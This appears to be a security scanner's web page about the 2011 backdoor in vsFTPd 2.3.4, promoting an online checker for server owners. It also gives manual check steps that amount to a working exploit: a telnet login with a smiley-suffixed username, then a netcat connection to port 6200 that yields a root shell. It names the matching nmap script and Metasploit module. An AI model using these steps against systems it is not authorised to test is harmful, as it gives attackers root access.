Vsftpd Backdoor Checker
If you are using VSFTPD for FTP server, it is better to check your system for a backdoor vulnerability that emerged in the past years.
Short Info
Level
Critical
Single Scan
Single Scan
Can be used by
Asset Owner
Estimated Time
5 seconds
Time Interval
2 months 25 days
Scan only one
Domain, IPv4
Toolbox
-
What is FTP ?
FTP (File Transfer Protocol) is a TCP-based protocol that enables file transfer between the server and the client. There are different software offering FTP service and VSFTPD is only one of them.
What is vsFTP Backdoor Vulnerability ?
In 2011, attackers managed to place a code snippet with a backdoor to vsFTPd 2.3.4 version source code.
If you installed vsFTPd 2.3.4 version with changed source code in 2011, you might be impacted by this vulnerability. People with malicious intent who exploit this vulnerability can access to user rights with the highest authorisation in the target system.
How To Check vsFTP Backdoor Vulnerability ?
You can check vsFTP Backdoor vulnerability with our free and online vsFTP Backdoor Vulnerability Checker. tool To do this, you can start by typing your domain name in the form on top of the page and start scanning.
Or you can run nmap --script ftp-vsftpd-backdoor -p 21 Target_Host command on nmap tool which can be installed to all operating systems.
Also, you can use vsftpd_234_backdoor exploit module of “Metasploit Framework” to check the vulnerability.
Lastly, you can check manually. If your FTP server is impacted from this vulnerability, you will have a result similar to the following:
telnet 172.19.0.100 21
Trying 172.19.0.100...
Connected to 172.19.0.100.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
USER invaliduser: )
331 Please specify the password.
PASS invalidpass
^]
telnet> quit
Connection closed.
When you deactivate the telnet connection and try to connect with 6200 port by using netcat or telnet command, you can see that operating system command runs with authorised user rights:
nc 172.19.0.100 6200
id
uid=0 (root) gid=0 (root)